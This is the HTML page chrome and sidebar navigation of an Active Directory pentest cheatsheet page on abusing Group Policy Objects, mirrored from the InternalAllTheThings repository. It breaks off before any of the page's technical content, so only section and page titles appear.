swisskyrepo
/
InternalAllTheThings
mirror of https://github.com/swisskyrepo/InternalAllTheThings.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
InternalAllTheThings/active-directory/ad-adds-group-policy-objects/index.html

4303 lines
96 KiB
HTML
Raw Blame History

This file contains ambiguous Unicode characters!

This file contains ambiguous Unicode characters that may be confused with others in your current locale. If your use case is intentional and legitimate, you can safely ignore this warning. Use the Escape button to highlight these characters.

<!doctype html>
<html lang="en" class="no-js">
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width,initial-scale=1">
<meta name="description" content="Active Directory and Internal Pentest Cheatsheets">
<link rel="canonical" href="https://swisskyrepo.github.io/InternalAllTheThings/active-directory/ad-adds-group-policy-objects/">
<link rel="prev" href="../ad-adds-enumerate/">
<link rel="next" href="../ad-adds-groups/">
<link rel="icon" href="../../assets/images/favicon.png">
<meta name="generator" content="mkdocs-1.6.1, mkdocs-material-9.5.44">
<title>Active Directory - Group Policy Objects - Internal All The Things</title>
<link rel="stylesheet" href="../../assets/stylesheets/main.0253249f.min.css">
<link rel="stylesheet" href="../../assets/stylesheets/palette.06af60db.min.css">
<style>
.social-container {
float: right;
}
</style>
<link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
<link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Roboto:300,300i,400,400i,700,700i%7CRoboto+Mono:400,400i,700,700i&display=fallback">
<style>:root{--md-text-font:"Roboto";--md-code-font:"Roboto Mono"}</style>
<link rel="stylesheet" href="../../custom.css">
<script>__md_scope=new URL("../..",location),__md_hash=e=>[...e].reduce(((e,_)=>(e<<5)-e+_.charCodeAt(0)),0),__md_get=(e,_=localStorage,t=__md_scope)=>JSON.parse(_.getItem(t.pathname+"."+e)),__md_set=(e,_,t=localStorage,a=__md_scope)=>{try{t.setItem(a.pathname+"."+e,JSON.stringify(_))}catch(e){}}</script>
<meta property="og:type" content="website" >
<meta property="og:title" content="Active Directory - Group Policy Objects - Internal All The Things" >
<meta property="og:description" content="Active Directory and Internal Pentest Cheatsheets" >
<meta property="og:image" content="https://swisskyrepo.github.io/InternalAllTheThings/assets/images/social/active-directory/ad-adds-group-policy-objects.png" >
<meta property="og:image:type" content="image/png" >
<meta property="og:image:width" content="1200" >
<meta property="og:image:height" content="630" >
<meta property="og:url" content="https://swisskyrepo.github.io/InternalAllTheThings/active-directory/ad-adds-group-policy-objects/" >
<meta name="twitter:card" content="summary_large_image" >
<meta name="twitter:title" content="Active Directory - Group Policy Objects - Internal All The Things" >
<meta name="twitter:description" content="Active Directory and Internal Pentest Cheatsheets" >
<meta name="twitter:image" content="https://swisskyrepo.github.io/InternalAllTheThings/assets/images/social/active-directory/ad-adds-group-policy-objects.png" >
</head>
<body dir="ltr" data-md-color-scheme="default" data-md-color-primary="indigo" data-md-color-accent="indigo">
<input class="md-toggle" data-md-toggle="drawer" type="checkbox" id="__drawer" autocomplete="off">
<input class="md-toggle" data-md-toggle="search" type="checkbox" id="__search" autocomplete="off">
<label class="md-overlay" for="__drawer"></label>
<div data-md-component="skip">
<a href="#active-directory-group-policy-objects" class="md-skip">
Skip to content
</a>
</div>
<div data-md-component="announce">
</div>
<header class="md-header md-header--shadow" data-md-component="header">
<nav class="md-header__inner md-grid" aria-label="Header">
<a href="../.." title="Internal All The Things" class="md-header__button md-logo" aria-label="Internal All The Things" data-md-component="logo">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M12 8a3 3 0 0 0 3-3 3 3 0 0 0-3-3 3 3 0 0 0-3 3 3 3 0 0 0 3 3m0 3.54C9.64 9.35 6.5 8 3 8v11c3.5 0 6.64 1.35 9 3.54 2.36-2.19 5.5-3.54 9-3.54V8c-3.5 0-6.64 1.35-9 3.54"/></svg>
</a>
<label class="md-header__button md-icon" for="__drawer">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M3 6h18v2H3zm0 5h18v2H3zm0 5h18v2H3z"/></svg>
</label>
<div class="md-header__title" data-md-component="header-title">
<div class="md-header__ellipsis">
<div class="md-header__topic">
<span class="md-ellipsis">
Internal All The Things
</span>
</div>
<div class="md-header__topic" data-md-component="header-topic">
<span class="md-ellipsis">
Active Directory - Group Policy Objects
</span>
</div>
</div>
</div>
<form class="md-header__option" data-md-component="palette">
<input class="md-option" data-md-color-media="(prefers-color-scheme: light)" data-md-color-scheme="default" data-md-color-primary="indigo" data-md-color-accent="indigo" aria-label="Switch to dark mode" type="radio" name="__palette" id="__palette_0">
<label class="md-header__button md-icon" title="Switch to dark mode" for="__palette_1" hidden>
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M12 8a4 4 0 0 0-4 4 4 4 0 0 0 4 4 4 4 0 0 0 4-4 4 4 0 0 0-4-4m0 10a6 6 0 0 1-6-6 6 6 0 0 1 6-6 6 6 0 0 1 6 6 6 6 0 0 1-6 6m8-9.31V4h-4.69L12 .69 8.69 4H4v4.69L.69 12 4 15.31V20h4.69L12 23.31 15.31 20H20v-4.69L23.31 12z"/></svg>
</label>
<input class="md-option" data-md-color-media="(prefers-color-scheme: dark)" data-md-color-scheme="slate" data-md-color-primary="indigo" data-md-color-accent="indigo" aria-label="Switch to light mode" type="radio" name="__palette" id="__palette_1">
<label class="md-header__button md-icon" title="Switch to light mode" for="__palette_0" hidden>
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M12 18c-.89 0-1.74-.2-2.5-.55C11.56 16.5 13 14.42 13 12s-1.44-4.5-3.5-5.45C10.26 6.2 11.11 6 12 6a6 6 0 0 1 6 6 6 6 0 0 1-6 6m8-9.31V4h-4.69L12 .69 8.69 4H4v4.69L.69 12 4 15.31V20h4.69L12 23.31 15.31 20H20v-4.69L23.31 12z"/></svg>
</label>
</form>
<script>var palette=__md_get("__palette");if(palette&&palette.color){if("(prefers-color-scheme)"===palette.color.media){var media=matchMedia("(prefers-color-scheme: light)"),input=document.querySelector(media.matches?"[data-md-color-media='(prefers-color-scheme: light)']":"[data-md-color-media='(prefers-color-scheme: dark)']");palette.color.media=input.getAttribute("data-md-color-media"),palette.color.scheme=input.getAttribute("data-md-color-scheme"),palette.color.primary=input.getAttribute("data-md-color-primary"),palette.color.accent=input.getAttribute("data-md-color-accent")}for(var[key,value]of Object.entries(palette.color))document.body.setAttribute("data-md-color-"+key,value)}</script>
<label class="md-header__button md-icon" for="__search">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M9.5 3A6.5 6.5 0 0 1 16 9.5c0 1.61-.59 3.09-1.56 4.23l.27.27h.79l5 5-1.5 1.5-5-5v-.79l-.27-.27A6.52 6.52 0 0 1 9.5 16 6.5 6.5 0 0 1 3 9.5 6.5 6.5 0 0 1 9.5 3m0 2C7 5 5 7 5 9.5S7 14 9.5 14 14 12 14 9.5 12 5 9.5 5"/></svg>
</label>
<div class="md-search" data-md-component="search" role="dialog">
<label class="md-search__overlay" for="__search"></label>
<div class="md-search__inner" role="search">
<form class="md-search__form" name="search">
<input type="text" class="md-search__input" name="query" aria-label="Search" placeholder="Search" autocapitalize="off" autocorrect="off" autocomplete="off" spellcheck="false" data-md-component="search-query" required>
<label class="md-search__icon md-icon" for="__search">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M9.5 3A6.5 6.5 0 0 1 16 9.5c0 1.61-.59 3.09-1.56 4.23l.27.27h.79l5 5-1.5 1.5-5-5v-.79l-.27-.27A6.52 6.52 0 0 1 9.5 16 6.5 6.5 0 0 1 3 9.5 6.5 6.5 0 0 1 9.5 3m0 2C7 5 5 7 5 9.5S7 14 9.5 14 14 12 14 9.5 12 5 9.5 5"/></svg>
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M20 11v2H8l5.5 5.5-1.42 1.42L4.16 12l7.92-7.92L13.5 5.5 8 11z"/></svg>
</label>
<nav class="md-search__options" aria-label="Search">
<a href="javascript:void(0)" class="md-search__icon md-icon" title="Share" aria-label="Share" data-clipboard data-clipboard-text="" data-md-component="search-share" tabindex="-1">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M18 16.08c-.76 0-1.44.3-1.96.77L8.91 12.7c.05-.23.09-.46.09-.7s-.04-.47-.09-.7l7.05-4.11c.54.5 1.25.81 2.04.81a3 3 0 0 0 3-3 3 3 0 0 0-3-3 3 3 0 0 0-3 3c0 .24.04.47.09.7L8.04 9.81C7.5 9.31 6.79 9 6 9a3 3 0 0 0-3 3 3 3 0 0 0 3 3c.79 0 1.5-.31 2.04-.81l7.12 4.15c-.05.21-.08.43-.08.66 0 1.61 1.31 2.91 2.92 2.91s2.92-1.3 2.92-2.91A2.92 2.92 0 0 0 18 16.08"/></svg>
</a>
<button type="reset" class="md-search__icon md-icon" title="Clear" aria-label="Clear" tabindex="-1">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M19 6.41 17.59 5 12 10.59 6.41 5 5 6.41 10.59 12 5 17.59 6.41 19 12 13.41 17.59 19 19 17.59 13.41 12z"/></svg>
</button>
</nav>
<div class="md-search__suggest" data-md-component="search-suggest"></div>
</form>
<div class="md-search__output">
<div class="md-search__scrollwrap" tabindex="0" data-md-scrollfix>
<div class="md-search-result" data-md-component="search-result">
<div class="md-search-result__meta">
Initializing search
</div>
<ol class="md-search-result__list" role="presentation"></ol>
</div>
</div>
</div>
</div>
</div>
<div class="md-header__source">
<a href="https://github.com/swisskyrepo/InternalAllTheThings" title="Go to repository" class="md-source" data-md-component="source">
<div class="md-source__icon md-icon">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 496 512"><!--! Font Awesome Free 6.6.0 by @fontawesome - https://fontawesome.com License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License) Copyright 2024 Fonticons, Inc.--><path d="M165.9 397.4c0 2-2.3 3.6-5.2 3.6-3.3.3-5.6-1.3-5.6-3.6 0-2 2.3-3.6 5.2-3.6 3-.3 5.6 1.3 5.6 3.6m-31.1-4.5c-.7 2 1.3 4.3 4.3 4.9 2.6 1 5.6 0 6.2-2s-1.3-4.3-4.3-5.2c-2.6-.7-5.5.3-6.2 2.3m44.2-1.7c-2.9.7-4.9 2.6-4.6 4.9.3 2 2.9 3.3 5.9 2.6 2.9-.7 4.9-2.6 4.6-4.6-.3-1.9-3-3.2-5.9-2.9M244.8 8C106.1 8 0 113.3 0 252c0 110.9 69.8 205.8 169.5 239.2 12.8 2.3 17.3-5.6 17.3-12.1 0-6.2-.3-40.4-.3-61.4 0 0-70 15-84.7-29.8 0 0-11.4-29.1-27.8-36.6 0 0-22.9-15.7 1.6-15.4 0 0 24.9 2 38.6 25.8 21.9 38.6 58.6 27.5 72.9 20.9 2.3-16 8.8-27.1 16-33.7-55.9-6.2-112.3-14.3-112.3-110.5 0-27.5 7.6-41.3 23.6-58.9-2.6-6.5-11.1-33.3 2.6-67.9 20.9-6.5 69 27 69 27 20-5.6 41.5-8.5 62.8-8.5s42.8 2.9 62.8 8.5c0 0 48.1-33.6 69-27 13.7 34.7 5.2 61.4 2.6 67.9 16 17.7 25.8 31.5 25.8 58.9 0 96.5-58.9 104.2-114.8 110.5 9.2 7.9 17 22.9 17 46.4 0 33.7-.3 75.4-.3 83.6 0 6.5 4.6 14.4 17.3 12.1C428.2 457.8 496 362.9 496 252 496 113.3 383.5 8 244.8 8M97.2 352.9c-1.3 1-1 3.3.7 5.2 1.6 1.6 3.9 2.3 5.2 1 1.3-1 1-3.3-.7-5.2-1.6-1.6-3.9-2.3-5.2-1m-10.8-8.1c-.7 1.3.3 2.9 2.3 3.9 1.6 1 3.6.7 4.3-.7.7-1.3-.3-2.9-2.3-3.9-2-.6-3.6-.3-4.3.7m32.4 35.6c-1.6 1.3-1 4.3 1.3 6.2 2.3 2.3 5.2 2.6 6.5 1 1.3-1.3.7-4.3-1.3-6.2-2.2-2.3-5.2-2.6-6.5-1m-11.4-14.7c-1.6 1-1.6 3.6 0 5.9s4.3 3.3 5.6 2.3c1.6-1.3 1.6-3.9 0-6.2-1.4-2.3-4-3.3-5.6-2"/></svg>
</div>
<div class="md-source__repository">
GitHub
</div>
</a>
</div>
</nav>
</header>
<div class="md-container" data-md-component="container">
<main class="md-main" data-md-component="main">
<div class="md-main__inner md-grid">
<div class="md-sidebar md-sidebar--primary" data-md-component="sidebar" data-md-type="navigation" >
<div class="md-sidebar__scrollwrap">
<div class="md-sidebar__inner">
<nav class="md-nav md-nav--primary" aria-label="Navigation" data-md-level="0">
<label class="md-nav__title" for="__drawer">
<a href="../.." title="Internal All The Things" class="md-nav__button md-logo" aria-label="Internal All The Things" data-md-component="logo">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M12 8a3 3 0 0 0 3-3 3 3 0 0 0-3-3 3 3 0 0 0-3 3 3 3 0 0 0 3 3m0 3.54C9.64 9.35 6.5 8 3 8v11c3.5 0 6.64 1.35 9 3.54 2.36-2.19 5.5-3.54 9-3.54V8c-3.5 0-6.64 1.35-9 3.54"/></svg>
</a>
Internal All The Things
</label>
<div class="md-nav__source">
<a href="https://github.com/swisskyrepo/InternalAllTheThings" title="Go to repository" class="md-source" data-md-component="source">
<div class="md-source__icon md-icon">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 496 512"><!--! Font Awesome Free 6.6.0 by @fontawesome - https://fontawesome.com License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License) Copyright 2024 Fonticons, Inc.--><path d="M165.9 397.4c0 2-2.3 3.6-5.2 3.6-3.3.3-5.6-1.3-5.6-3.6 0-2 2.3-3.6 5.2-3.6 3-.3 5.6 1.3 5.6 3.6m-31.1-4.5c-.7 2 1.3 4.3 4.3 4.9 2.6 1 5.6 0 6.2-2s-1.3-4.3-4.3-5.2c-2.6-.7-5.5.3-6.2 2.3m44.2-1.7c-2.9.7-4.9 2.6-4.6 4.9.3 2 2.9 3.3 5.9 2.6 2.9-.7 4.9-2.6 4.6-4.6-.3-1.9-3-3.2-5.9-2.9M244.8 8C106.1 8 0 113.3 0 252c0 110.9 69.8 205.8 169.5 239.2 12.8 2.3 17.3-5.6 17.3-12.1 0-6.2-.3-40.4-.3-61.4 0 0-70 15-84.7-29.8 0 0-11.4-29.1-27.8-36.6 0 0-22.9-15.7 1.6-15.4 0 0 24.9 2 38.6 25.8 21.9 38.6 58.6 27.5 72.9 20.9 2.3-16 8.8-27.1 16-33.7-55.9-6.2-112.3-14.3-112.3-110.5 0-27.5 7.6-41.3 23.6-58.9-2.6-6.5-11.1-33.3 2.6-67.9 20.9-6.5 69 27 69 27 20-5.6 41.5-8.5 62.8-8.5s42.8 2.9 62.8 8.5c0 0 48.1-33.6 69-27 13.7 34.7 5.2 61.4 2.6 67.9 16 17.7 25.8 31.5 25.8 58.9 0 96.5-58.9 104.2-114.8 110.5 9.2 7.9 17 22.9 17 46.4 0 33.7-.3 75.4-.3 83.6 0 6.5 4.6 14.4 17.3 12.1C428.2 457.8 496 362.9 496 252 496 113.3 383.5 8 244.8 8M97.2 352.9c-1.3 1-1 3.3.7 5.2 1.6 1.6 3.9 2.3 5.2 1 1.3-1 1-3.3-.7-5.2-1.6-1.6-3.9-2.3-5.2-1m-10.8-8.1c-.7 1.3.3 2.9 2.3 3.9 1.6 1 3.6.7 4.3-.7.7-1.3-.3-2.9-2.3-3.9-2-.6-3.6-.3-4.3.7m32.4 35.6c-1.6 1.3-1 4.3 1.3 6.2 2.3 2.3 5.2 2.6 6.5 1 1.3-1.3.7-4.3-1.3-6.2-2.2-2.3-5.2-2.6-6.5-1m-11.4-14.7c-1.6 1-1.6 3.6 0 5.9s4.3 3.3 5.6 2.3c1.6-1.3 1.6-3.9 0-6.2-1.4-2.3-4-3.3-5.6-2"/></svg>
</div>
<div class="md-source__repository">
GitHub
</div>
</a>
</div>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../.." class="md-nav__link">
<span class="md-ellipsis">
Internal All The Things
</span>
</a>
</li>
<li class="md-nav__item md-nav__item--active md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_2" checked>
<label class="md-nav__link" for="__nav_2" id="__nav_2_label" tabindex="0">
<span class="md-ellipsis">
Active directory
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_2_label" aria-expanded="true">
<label class="md-nav__title" for="__nav_2">
<span class="md-nav__icon md-icon"></span>
Active directory
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../ad-adcs-certificate-services/" class="md-nav__link">
<span class="md-ellipsis">
Active Directory - Certificate Services
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../ad-adds-acl-ace/" class="md-nav__link">
<span class="md-ellipsis">
Active Directory - Access Controls ACL/ACE
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../ad-adds-enumerate/" class="md-nav__link">
<span class="md-ellipsis">
Active Directory - Enumeration
</span>
</a>
</li>
<li class="md-nav__item md-nav__item--active">
<input class="md-nav__toggle md-toggle" type="checkbox" id="__toc">
<label class="md-nav__link md-nav__link--active" for="__toc">
<span class="md-ellipsis">
Active Directory - Group Policy Objects
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<a href="./" class="md-nav__link md-nav__link--active">
<span class="md-ellipsis">
Active Directory - Group Policy Objects
</span>
</a>
<nav class="md-nav md-nav--secondary" aria-label="Table of contents">
<label class="md-nav__title" for="__toc">
<span class="md-nav__icon md-icon"></span>
Table of contents
</label>
<ul class="md-nav__list" data-md-component="toc" data-md-scrollfix>
<li class="md-nav__item">
<a href="#find-vulnerable-gpo" class="md-nav__link">
<span class="md-ellipsis">
Find vulnerable GPO
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#abuse-gpo-with-sharpgpoabuse" class="md-nav__link">
<span class="md-ellipsis">
Abuse GPO with SharpGPOAbuse
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#abuse-gpo-with-powergpoabuse" class="md-nav__link">
<span class="md-ellipsis">
Abuse GPO with PowerGPOAbuse
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#abuse-gpo-with-pygpoabuse" class="md-nav__link">
<span class="md-ellipsis">
Abuse GPO with pyGPOAbuse
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#abuse-gpo-with-powerview" class="md-nav__link">
<span class="md-ellipsis">
Abuse GPO with PowerView
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#abuse-gpo-with-standin" class="md-nav__link">
<span class="md-ellipsis">
Abuse GPO with StandIn
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#references" class="md-nav__link">
<span class="md-ellipsis">
References
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item">
<a href="../ad-adds-groups/" class="md-nav__link">
<span class="md-ellipsis">
Active Directory - Groups
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../ad-adds-linux/" class="md-nav__link">
<span class="md-ellipsis">
Active Directory - Linux
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../ad-adds-machineaccountquota/" class="md-nav__link">
<span class="md-ellipsis">
Active Directory - Machine Account Quota
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../ad-adds-ntds-dumping/" class="md-nav__link">
<span class="md-ellipsis">
Active Directory - NTDS Dumping
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../ad-adds-rodc/" class="md-nav__link">
<span class="md-ellipsis">
Active Directory - Read Only Domain Controller
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../ad-adfs-federation-services/" class="md-nav__link">
<span class="md-ellipsis">
Active Directory - Federation Services
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../ad-integrated-dns/" class="md-nav__link">
<span class="md-ellipsis">
Active Directory - Integrated DNS - ADIDNS
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../ad-roasting-asrep/" class="md-nav__link">
<span class="md-ellipsis">
Roasting - ASREP Roasting
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../ad-roasting-kerberoasting/" class="md-nav__link">
<span class="md-ellipsis">
Roasting - Kerberoasting
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../ad-roasting-timeroasting/" class="md-nav__link">
<span class="md-ellipsis">
Roasting - Timeroasting
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../ad-tricks/" class="md-nav__link">
<span class="md-ellipsis">
Active Directory - Tricks
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../deployment-sccm/" class="md-nav__link">
<span class="md-ellipsis">
Deployment - SCCM
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../deployment-wsus/" class="md-nav__link">
<span class="md-ellipsis">
Deployment - WSUS
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../hash-capture/" class="md-nav__link">
<span class="md-ellipsis">
Hash - Capture and Cracking
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../hash-over-pass-the-hash/" class="md-nav__link">
<span class="md-ellipsis">
Hash - OverPass-the-Hash
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../hash-pass-the-hash/" class="md-nav__link">
<span class="md-ellipsis">
Hash - Pass the Hash
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../hash-pass-the-key/" class="md-nav__link">
<span class="md-ellipsis">
Hash - Pass The Key
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../internal-dcom/" class="md-nav__link">
<span class="md-ellipsis">
Internal - DCOM
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../internal-mitm-relay/" class="md-nav__link">
<span class="md-ellipsis">
Internal - MITM and Relay
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../internal-pxe-boot-image/" class="md-nav__link">
<span class="md-ellipsis">
Internal - PXE Boot Image
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../internal-shares/" class="md-nav__link">
<span class="md-ellipsis">
Internal - Shares
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../kerberos-bronze-bit/" class="md-nav__link">
<span class="md-ellipsis">
Kerberos - Bronze Bit
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../kerberos-delegation-constrained/" class="md-nav__link">
<span class="md-ellipsis">
Kerberos Delegation - Constrained Delegation
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../kerberos-delegation-rbcd/" class="md-nav__link">
<span class="md-ellipsis">
Kerberos Delegation - Resource Based Constrained Delegation
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../kerberos-delegation-unconstrained/" class="md-nav__link">
<span class="md-ellipsis">
Kerberos Delegation - Unconstrained Delegation
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../kerberos-s4u/" class="md-nav__link">
<span class="md-ellipsis">
Kerberos - Service for User Extension
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../kerberos-tickets/" class="md-nav__link">
<span class="md-ellipsis">
Kerberos - Tickets
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../pwd-comments/" class="md-nav__link">
<span class="md-ellipsis">
Password - AD User Comment
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../pwd-dsrm-credentials/" class="md-nav__link">
<span class="md-ellipsis">
Password - DSRM Credentials
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../pwd-group-policy-preferences/" class="md-nav__link">
<span class="md-ellipsis">
Password - Group Policy Preferences
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../pwd-precreated-computer/" class="md-nav__link">
<span class="md-ellipsis">
Password - Pre-Created Computer Account
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../pwd-read-gmsa/" class="md-nav__link">
<span class="md-ellipsis">
Password - GMSA
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../pwd-read-laps/" class="md-nav__link">
<span class="md-ellipsis">
Password - LAPS
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../pwd-shadow-credentials/" class="md-nav__link">
<span class="md-ellipsis">
Password - Shadow Credentials
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../pwd-spraying/" class="md-nav__link">
<span class="md-ellipsis">
Password - Spraying
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../trust-pam/" class="md-nav__link">
<span class="md-ellipsis">
Trust - Privileged Access Management
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../trust-relationship/" class="md-nav__link">
<span class="md-ellipsis">
Trust - Relationship
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../trust-sid-hijacking/" class="md-nav__link">
<span class="md-ellipsis">
Child Domain to Forest Compromise - SID Hijacking
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../trust-ticket/" class="md-nav__link">
<span class="md-ellipsis">
Forest to Forest Compromise - Trust Ticket
</span>
</a>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_2_44" >
<label class="md-nav__link" for="__nav_2_44" id="__nav_2_44_label" tabindex="0">
<span class="md-ellipsis">
CVE
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="2" aria-labelledby="__nav_2_44_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_2_44">
<span class="md-nav__icon md-icon"></span>
CVE
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../CVE/MS14-068/" class="md-nav__link">
<span class="md-ellipsis">
MS14-068 Checksum Validation
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../CVE/NoPAC/" class="md-nav__link">
<span class="md-ellipsis">
NoPAC / samAccountName Spoofing
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../CVE/PrintNightmare/" class="md-nav__link">
<span class="md-ellipsis">
PrintNightmare
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../CVE/PrivExchange/" class="md-nav__link">
<span class="md-ellipsis">
PrivExchange
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../CVE/ZeroLogon/" class="md-nav__link">
<span class="md-ellipsis">
ZeroLogon
</span>
</a>
</li>
</ul>
</nav>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_3" >
<label class="md-nav__link" for="__nav_3" id="__nav_3_label" tabindex="0">
<span class="md-ellipsis">
Cheatsheets
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_3_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_3">
<span class="md-nav__icon md-icon"></span>
Cheatsheets
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../cheatsheets/escape-breakout/" class="md-nav__link">
<span class="md-ellipsis">
Kiosk Escape and Jail Breakout
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../cheatsheets/hash-cracking/" class="md-nav__link">
<span class="md-ellipsis">
Hash Cracking
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../cheatsheets/mimikatz-cheatsheet/" class="md-nav__link">
<span class="md-ellipsis">
Mimikatz
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../cheatsheets/miscellaneous-tricks/" class="md-nav__link">
<span class="md-ellipsis">
Miscellaneous &amp; Tricks
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../cheatsheets/network-discovery/" class="md-nav__link">
<span class="md-ellipsis">
Network Discovery
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../cheatsheets/powershell-cheatsheet/" class="md-nav__link">
<span class="md-ellipsis">
Powershell
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../cheatsheets/shell-bind-cheatsheet/" class="md-nav__link">
<span class="md-ellipsis">
Bind Shell
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../cheatsheets/shell-reverse-cheatsheet/" class="md-nav__link">
<span class="md-ellipsis">
Reverse Shell Cheat Sheet
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../cheatsheets/source-code-management-ci/" class="md-nav__link">
<span class="md-ellipsis">
Source Code Management &amp; CI/CD Compromise
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_4" >
<label class="md-nav__link" for="__nav_4" id="__nav_4_label" tabindex="0">
<span class="md-ellipsis">
Cloud
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_4_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_4">
<span class="md-nav__icon md-icon"></span>
Cloud
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_4_1" >
<label class="md-nav__link" for="__nav_4_1" id="__nav_4_1_label" tabindex="0">
<span class="md-ellipsis">
Aws
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="2" aria-labelledby="__nav_4_1_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_4_1">
<span class="md-nav__icon md-icon"></span>
Aws
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../cloud/aws/aws-access-token/" class="md-nav__link">
<span class="md-ellipsis">
AWS - Access Token &amp; Secrets
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../cloud/aws/aws-cli/" class="md-nav__link">
<span class="md-ellipsis">
AWS - CLI
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../cloud/aws/aws-cognito/" class="md-nav__link">
<span class="md-ellipsis">
AWS - Service - Cognito
</span>
</a>
</li>
<li class="md-nav__item">
